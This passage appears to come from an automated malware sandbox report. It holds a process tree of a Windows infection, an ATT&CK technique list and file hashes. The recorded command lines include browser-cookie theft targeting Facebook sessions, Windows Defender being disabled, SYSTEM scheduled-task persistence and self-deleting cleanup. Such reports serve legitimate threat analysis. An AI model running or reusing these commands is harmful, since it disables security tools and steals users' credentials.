                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                • Drops file in Program Files directory
                                                                                PID:4412
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                • Drops file in Program Files directory
                                                                                PID:2452
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                • Drops file in Program Files directory
                                                                                PID:4848
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:5756
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBA89.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:4560
                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Drops file in Program Files directory
                                                                                    PID:4160
                                                                                • C:\Users\Admin\Documents\4uLMT1l7rNDG_9kZss5zO978.exe
                                                                                  "C:\Users\Admin\Documents\4uLMT1l7rNDG_9kZss5zO978.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:4956
                                                                                • C:\Users\Admin\Documents\L6MtW1a3rbfgy1_5zMlEnu44.exe
                                                                                  "C:\Users\Admin\Documents\L6MtW1a3rbfgy1_5zMlEnu44.exe"
                                                                                  6⤵
                                                                                    PID:4240
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im L6MtW1a3rbfgy1_5zMlEnu44.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\L6MtW1a3rbfgy1_5zMlEnu44.exe" & del C:\ProgramData\*.dll & exit
                                                                                      7⤵
                                                                                        PID:5848
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /im L6MtW1a3rbfgy1_5zMlEnu44.exe /f
                                                                                          8⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:5952
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /t 6
                                                                                          8⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:6116
                                                                                    • C:\Users\Admin\Documents\U6j0_QNf6OVHdxTClq8YMQ3r.exe
                                                                                      "C:\Users\Admin\Documents\U6j0_QNf6OVHdxTClq8YMQ3r.exe"
                                                                                      6⤵
                                                                                        PID:4336
                                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops startup file
                                                                                          PID:4984
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5152
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2044
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5548
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5716
                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:6076
                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2452
                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            8⤵
                                                                                              PID:3192
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4452
                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks whether UAC is enabled
                                                                                            PID:412
                                                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4264
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5860
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4368
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              8⤵
                                                                                                PID:4336
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                  PID:1528
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                          4⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2256
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\sonia_6.exe
                                                                                            sonia_6.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:636
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4044
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1860
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              6⤵
                                                                                                PID:5440
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                6⤵
                                                                                                  PID:6064
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                              4⤵
                                                                                                PID:2220
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 532
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1768
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                          1⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1224
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Checks processor information in registry
                                                                                            • Modifies registry class
                                                                                            PID:4108
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Checks processor information in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Modifies registry class
                                                                                            PID:3832
                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                          1⤵
                                                                                          • Process spawned unexpected child process
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1544
                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                            2⤵
                                                                                            • Loads dropped DLL
                                                                                            • Modifies registry class
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3620
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                          1⤵
                                                                                          • Process spawned unexpected child process
                                                                                          PID:4208
                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                            2⤵
                                                                                            • Loads dropped DLL
                                                                                            • Modifies registry class
                                                                                            PID:3840
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                          1⤵
                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                          PID:4756
                                                                                        • C:\Windows\System32\SLUI.exe
                                                                                          "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
                                                                                          1⤵
                                                                                            PID:5352
                                                                                          • C:\Users\Admin\AppData\Local\Temp\3678.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\3678.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:5984
                                                                                          • C:\Users\Admin\AppData\Local\Temp\456D.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\456D.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5460
                                                                                          • C:\Users\Admin\AppData\Local\Temp\57CE.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\57CE.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:6000
                                                                                          • C:\Users\Admin\AppData\Local\Temp\E142.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\E142.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Windows directory
                                                                                            PID:4648
                                                                                            • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                              "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                              2⤵
                                                                                                PID:4292
                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                schtasks /create /sc minute /ED "12/12/2022" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                2⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:4552
                                                                                              • C:\Windows\System\svchost.exe
                                                                                                "C:\Windows\System\svchost.exe" formal
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Windows directory
                                                                                                PID:4468
                                                                                                • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                  "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                  3⤵
                                                                                                    PID:4964
                                                                                                  • C:\Windows\System\spoolsv.exe
                                                                                                    "C:\Windows\System\spoolsv.exe" --MaxCircuitDirtiness 60 --NewCircuitPeriod 1 --MaxClientCircuitsPending 1024 --OptimisticData 1 --KeepalivePeriod 30 --CircuitBuildTimeout 10 --EnforceDistinctSubnets 0 --HardwareAccel 1 --UseEntryGuards 0
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1056
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:5700
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5192
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:4996
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:1348
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:4248
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5892
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:5356
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:4364
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:5044
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                  1⤵
                                                                                                                    PID:5928
                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                    1⤵
                                                                                                                      PID:5476
                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                      1⤵
                                                                                                                        PID:5664
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                        1⤵
                                                                                                                          PID:5152
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D139.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D139.exe
                                                                                                                          1⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          PID:5756
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im D139.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D139.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                            2⤵
                                                                                                                              PID:5708
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im D139.exe /f
                                                                                                                                3⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:5372
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /t 6
                                                                                                                                3⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:5312

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                          Execution

                                                                                                                          Scheduled Task

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          Persistence

                                                                                                                          Modify Existing Service

                                                                                                                          1
                                                                                                                          T1031

                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                          2
                                                                                                                          T1060

                                                                                                                          Scheduled Task

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          BITS Jobs

                                                                                                                          1
                                                                                                                          T1197

                                                                                                                          Privilege Escalation

                                                                                                                          Scheduled Task

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          Defense Evasion

                                                                                                                          Modify Registry

                                                                                                                          5
                                                                                                                          T1112

                                                                                                                          Disabling Security Tools

                                                                                                                          3
                                                                                                                          T1089

                                                                                                                          BITS Jobs

                                                                                                                          1
                                                                                                                          T1197

                                                                                                                          Install Root Certificate

                                                                                                                          1
                                                                                                                          T1130

                                                                                                                          Credential Access

                                                                                                                          Credentials in Files

                                                                                                                          4
                                                                                                                          T1081

                                                                                                                          Discovery

                                                                                                                          Query Registry

                                                                                                                          4
                                                                                                                          T1012

                                                                                                                          System Information Discovery

                                                                                                                          5
                                                                                                                          T1082

                                                                                                                          Security Software Discovery

                                                                                                                          1
                                                                                                                          T1063

                                                                                                                          Peripheral Device Discovery

                                                                                                                          1
                                                                                                                          T1120

                                                                                                                          Collection

                                                                                                                          Data from Local System

                                                                                                                          4
                                                                                                                          T1005

                                                                                                                          Command and Control

                                                                                                                          Web Service

                                                                                                                          1
                                                                                                                          T1102

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                            MD5

                                                                                                                            213e00f202cd18120a1e44ea3a93d267

                                                                                                                            SHA1

                                                                                                                            ff07223275c627f04f64b8dc691a2e9eb0239883

                                                                                                                            SHA256

                                                                                                                            1ba80ea646c4375e8c7aa286eb25600013d13540d3324996db6a824d0ef9a7ae

                                                                                                                            SHA512

                                                                                                                            a4c9c443341d3943c9453ac1237e54f70f942a5c3c6032e86b942d8d16b8acffe61c0f3c1feec9d90d926be147e4272b477f423c830bee09287abf67596e78b2

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                            MD5

                                                                                                                            35a5ab71990f411955cba00ae4dcc346

                                                                                                                            SHA1

                                                                                                                            c69ae00c634b1a9f0d90eb7564e2f14fcf5114bc

                                                                                                                            SHA256

                                                                                                                            5fbdd9a6cf0bc06c5e9d51ce01bb0e537a7581627be1420b29e36dec46067eee

                                                                                                                            SHA512

                                                                                                                            af70223952937f8eeb4d79b63367da28cfec1f9fa296966176ff574d20702443f8e1209633b9505232640ea4442f251b830e51b4c8acc3dba67b28ecf5b4a5d5

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                            MD5

                                                                                                                            815da3d48269d807544a19576eb293bb

                                                                                                                            SHA1

                                                                                                                            1d99af349b7e3e9e554cf4338d53fbf1ea65f816

                                                                                                                            SHA256

                                                                                                                            bd58f7148565d5e015f1554f5d61941c4919e40b767b9aaf734ef0863d8083d4

                                                                                                                            SHA512

                                                                                                                            d1ea739d1978a3d31fa6150dbb7e2a879e95c89af904e4096485ccfa90dd02f1d872628d7724b880703e022aedcf4172ebae3668d25a98c07714ebd7e2867632

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                            MD5

                                                                                                                            625d72a2ffc940d629685f95587958db

                                                                                                                            SHA1

                                                                                                                            17469fb2a2ae5a0e878b5648931f0f5ecb54b0f7

                                                                                                                            SHA256

                                                                                                                            43615dd203f632e3fd1254ca0684edd0d1ab6a1393c256e2df24d3322aeb2182

                                                                                                                            SHA512

                                                                                                                            727d78c1e2770b30dacb6a4aaf0eb3b824187f9f8dfeeeab3c1bff8bdfb6e39b79f5ca99acd34d418ad738eab25648d54ce419d945665cabc9138923e5c93439

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                            MD5

                                                                                                                            70900c0eddbba1fdbcee97d98f29a7ad

                                                                                                                            SHA1

                                                                                                                            0782545216c8f936c334d3b638107464e34c1288

                                                                                                                            SHA256

                                                                                                                            3f17201eb47f6ab1ed091f431d29cb5845354fef1420d99cccb4febe0469a556

                                                                                                                            SHA512

                                                                                                                            f47f7e1a5ed5950c142ab2875774326c9e6f78466c1ea6f52094b05af213d088ae8e7cd4def9dae5728e83ba28c99fab8439a66b92ee106605aeda7624232996

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\libcurl.dll
                                                                                                                            MD5

                                                                                                                            d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                            SHA1

                                                                                                                            028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                            SHA256

                                                                                                                            0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                            SHA512

                                                                                                                            857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\libcurlpp.dll
                                                                                                                            MD5

                                                                                                                            e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                            SHA1

                                                                                                                            b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                            SHA256

                                                                                                                            43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                            SHA512

                                                                                                                            9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\libgcc_s_dw2-1.dll
                                                                                                                            MD5

                                                                                                                            9aec524b616618b0d3d00b27b6f51da1

                                                                                                                            SHA1

                                                                                                                            64264300801a353db324d11738ffed876550e1d3

                                                                                                                            SHA256

                                                                                                                            59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                            SHA512

                                                                                                                            0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\libstdc++-6.dll
                                                                                                                            MD5

                                                                                                                            5e279950775baae5fea04d2cc4526bcc

                                                                                                                            SHA1

                                                                                                                            8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                            SHA256

                                                                                                                            97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                            SHA512

                                                                                                                            666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\libwinpthread-1.dll
                                                                                                                            MD5

                                                                                                                            1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                            SHA1

                                                                                                                            fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                            SHA256

                                                                                                                            509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                            SHA512

                                                                                                                            3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\setup_install.exe
                                                                                                                            MD5

                                                                                                                            a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                            SHA1

                                                                                                                            e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                            SHA256

                                                                                                                            0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                            SHA512

                                                                                                                            c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\setup_install.exe
                                                                                                                            MD5

                                                                                                                            a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                            SHA1

                                                                                                                            e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                            SHA256

                                                                                                                            0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                            SHA512

                                                                                                                            c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\sonia_1.exe
                                                                                                                            MD5

                                                                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                                                                            SHA1

                                                                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                            SHA256

                                                                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                            SHA512

                                                                                                                            33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\sonia_1.exe
                                                                                                                            MD5

                                                                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                                                                            SHA1

                                                                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                            SHA256

                                                                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                            SHA512

                                                                                                                            33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC3C20E84\sonia_1.txt
                                                                                                                            MD5

                                                                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                                                                            SHA1

                                                                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                            SHA256

                                                                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                            SHA512

